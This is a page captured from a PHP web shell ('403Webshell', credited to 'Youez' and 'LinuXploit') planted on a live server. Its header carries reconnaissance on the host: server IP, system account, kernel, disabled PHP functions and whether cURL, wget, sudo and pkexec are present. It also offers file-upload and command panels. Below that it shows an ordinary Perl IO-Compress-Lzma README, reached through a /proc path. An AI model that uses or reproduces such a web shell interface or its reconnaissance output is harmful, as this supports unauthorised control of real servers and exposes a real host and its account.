403Webshell
Server IP : 88.99.149.37  /  Your IP : 216.73.216.141
Web Server : nginx/1.31.2
System : Linux server-88-99-149-37 6.12.0-124.56.5.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Fri May 15 06:12:08 EDT 2026 x86_64
User : muralimurth ( 1015)
PHP Version : 8.4.23
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/1/cwd/usr/share/doc/perl-IO-Compress-Lzma/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/1/cwd/usr/share/doc/perl-IO-Compress-Lzma/README
                            IO-Compress-Lzma

                         Version 2.206

                               25 July 2023

        Copyright (c) 2009-2023 Paul Marquess. All rights reserved.
          This program is free software; you can redistribute it
           and/or modify it under the same terms as Perl itself.

DESCRIPTION
-----------

This module provides a Perl interface to allow reading and writing of
lzma files/buffers.

PREREQUISITES
-------------

Before you can build IO-Compress-Lzma you need to have the following
installed on your system:

    * Perl 5.006 or better.
    * Compress::Raw::Lzma
    * IO::Compress

BUILDING THE MODULE
-------------------

Assuming you have met all the prerequisites, the module can now be built
using this sequence of commands:

    perl Makefile.PL
    make
    make test

INSTALLATION
------------

To install IO-Compress-Lzma, run the command below:

    make install

TROUBLESHOOTING
---------------

SUPPORT
-------

General feedback/questions/bug reports should be sent to
https://github.com/pmqs/IO-Compress-Lzma/issues

FEEDBACK
--------

How to report a problem with IO-Compress-Lzma.

To help me help you, I need all of the following information:

 1. The Versions of everything relevant.
    This includes:

     a. The *complete* output from running this

            perl -V

        Do not edit the output in any way.
        Note, I want you to run "perl -V" and NOT "perl -v".

        If your perl does not understand the "-V" option it is too
        old. This module needs Perl version 5.004 or better.

     b. The version of IO-Compress-Lzma you have.
        If you have successfully installed IO-Compress-Lzma, this one-liner
        will tell you:

           perl -MIO::Compress::Lzma -e 'print qq[ver $IO::Compress::Lzma::VERSION\n]'

        If you are  running windows use this

           perl -MIO::Compress::Lzma -e "print qq[ver $IO::Compress::Lzma::VERSION\n]"

        If you haven't installed IO-Compress-Lzma then search IO::Compress::Lzma.pm
        for a line like this:

          $VERSION = "2.206" ;

 2. If you are having problems building IO-Compress-Lzma, send me a
    complete log of what happened. Start by unpacking the IO-Compress-Lzma
    module into a fresh directory and keep a log of all the steps

        [edit config.in, if necessary]
        perl Makefile.PL
        make
        make test TEST_VERBOSE=1

Paul Marquess <pmqs@cpan.org>

Youez - 2016 - github.com/yon3zu
LinuXploit